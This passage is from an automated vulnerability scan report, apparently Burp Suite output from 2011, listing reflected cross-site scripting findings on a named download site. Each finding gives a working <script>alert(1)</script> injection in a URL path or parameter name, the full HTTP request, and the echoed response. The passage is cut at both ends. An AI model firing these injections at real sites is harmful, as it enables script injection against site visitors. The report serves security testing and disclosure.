HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:37:55 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:48:05 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 37083
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-usenet-c-44-newsgroup-clients-downloads.html7902c"><script>alert(1)</script>6aa1bdd3d27" /> ...[SNIP]...
1.129. http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2042"><script>alert(1)</script>dcfd4e32e26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-usenet-c-44-newsgroup-clients-downloads.html?d2042"><script>alert(1)</script>dcfd4e32e26=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:34:25 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:44:40 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 37086
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-usenet-c-44-newsgroup-clients-downloads.html?d2042"><script>alert(1)</script>dcfd4e32e26=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9c53"><script>alert(1)</script>61783017a7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-usenet-downloads.htmlb9c53"><script>alert(1)</script>61783017a7a HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:49:15 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:59:23 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 79250
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-usenet-downloads.htmlb9c53"><script>alert(1)</script>61783017a7a" /> ...[SNIP]...
1.131. http://www.x64bitdownload.com/64-bit-usenet-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-usenet-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7053"><script>alert(1)</script>b56ce311832 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-usenet-downloads.html?c7053"><script>alert(1)</script>b56ce311832=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:47:29 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:57:33 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 79253
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-usenet-downloads.html?c7053"><script>alert(1)</script>b56ce311832=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88aaf"><script>alert(1)</script>189e1a3160f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-usenet-search-engine-downloads.html88aaf"><script>alert(1)</script>189e1a3160f HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:40:17 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:50:23 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22usenet-search-engine%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22usenet+search+engine%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 38622
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-usenet-search-engine-downloads.html88aaf"><script>alert(1)</script>189e1a3160f" /> ...[SNIP]...
1.133. http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-usenet-search-engine-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6caf6"><script>alert(1)</script>8b75e1c033 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-usenet-search-engine-downloads.html?6caf6"><script>alert(1)</script>8b75e1c033=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:36:34 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:46:45 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22usenet-search-engine%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22usenet+search+engine%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 38624
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-usenet-search-engine-downloads.html?6caf6"><script>alert(1)</script>8b75e1c033=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a316"><script>alert(1)</script>d8cd7fa8591 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-usenext-downloads.html9a316"><script>alert(1)</script>d8cd7fa8591 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:53:02 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:03:44 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28788
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-usenext-downloads.html9a316"><script>alert(1)</script>d8cd7fa8591" /> ...[SNIP]...
1.135. http://www.x64bitdownload.com/64-bit-usenext-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-usenext-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 987b5"><script>alert(1)</script>7e91aeed80a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-usenext-downloads.html?987b5"><script>alert(1)</script>7e91aeed80a=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:48:46 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:58:56 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28791
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-usenext-downloads.html?987b5"><script>alert(1)</script>7e91aeed80a=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb00e"><script>alert(1)</script>e2b8c71a364 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-video-downloads.htmlcb00e"><script>alert(1)</script>e2b8c71a364 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:47:14 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:57:18 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 99716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-video-downloads.htmlcb00e"><script>alert(1)</script>e2b8c71a364" /> ...[SNIP]...
1.137. http://www.x64bitdownload.com/64-bit-video-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-video-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52103"><script>alert(1)</script>c4132b9c2b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-video-downloads.html?52103"><script>alert(1)</script>c4132b9c2b9=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:42:35 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:52:38 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 99719
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-video-downloads.html?52103"><script>alert(1)</script>c4132b9c2b9=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5865a"><script>alert(1)</script>73566294139 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-xpat-downloads.html5865a"><script>alert(1)</script>73566294139 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:57:52 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:07:59 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28936
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-xpat-downloads.html5865a"><script>alert(1)</script>73566294139" /> ...[SNIP]...
1.139. http://www.x64bitdownload.com/64-bit-xpat-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-xpat-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fc61"><script>alert(1)</script>c4ecea0b493 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-xpat-downloads.html?6fc61"><script>alert(1)</script>c4ecea0b493=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:54:19 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:04:52 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28939
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-xpat-downloads.html?6fc61"><script>alert(1)</script>c4ecea0b493=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b47d8"><script>alert(1)</script>80eaf09c798 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-yenc-downloads.htmlb47d8"><script>alert(1)</script>80eaf09c798 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:44:57 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:55:07 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 49292
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-yenc-downloads.htmlb47d8"><script>alert(1)</script>80eaf09c798" /> ...[SNIP]...
1.141. http://www.x64bitdownload.com/64-bit-yenc-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-yenc-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd8dd"><script>alert(1)</script>dc3655acae7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-yenc-downloads.html?bd8dd"><script>alert(1)</script>dc3655acae7=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:41:35 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:51:44 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 49295
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-yenc-downloads.html?bd8dd"><script>alert(1)</script>dc3655acae7=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97190"><script>alert(1)</script>9747501482a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /a-oz-insight-1768-downloads.html97190"><script>alert(1)</script>9747501482a HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:47:26 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:57:34 GMT Cache-Control: max-age=600 Pragma: cache Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 26073
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/a-oz-insight-1768-downloads.html97190"><script>alert(1)</script>9747501482a" /> ...[SNIP]...
1.143. http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/a-oz-insight-1768-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 654dd"><script>alert(1)</script>8885636ee6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /a-oz-insight-1768-downloads.html?654dd"><script>alert(1)</script>8885636ee6d=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:44:36 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:54:40 GMT Cache-Control: max-age=600 Pragma: cache Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 26076
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/a-oz-insight-1768-downloads.html?654dd"><script>alert(1)</script>8885636ee6d=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2275c"><script>alert(1)</script>5b1950577da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories2275c"><script>alert(1)</script>5b1950577da/free-64-bit-audio-multimedia-downloads-1-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:31:03 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categories2275c"><script>alert(1)</script>5b1950577da/free-64-bit-audio-multimedia-downloads-1-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93e79"><script>alert(1)</script>bc95b28f18 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-audio-multimedia-downloads-1-0-d.html93e79"><script>alert(1)</script>bc95b28f18 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
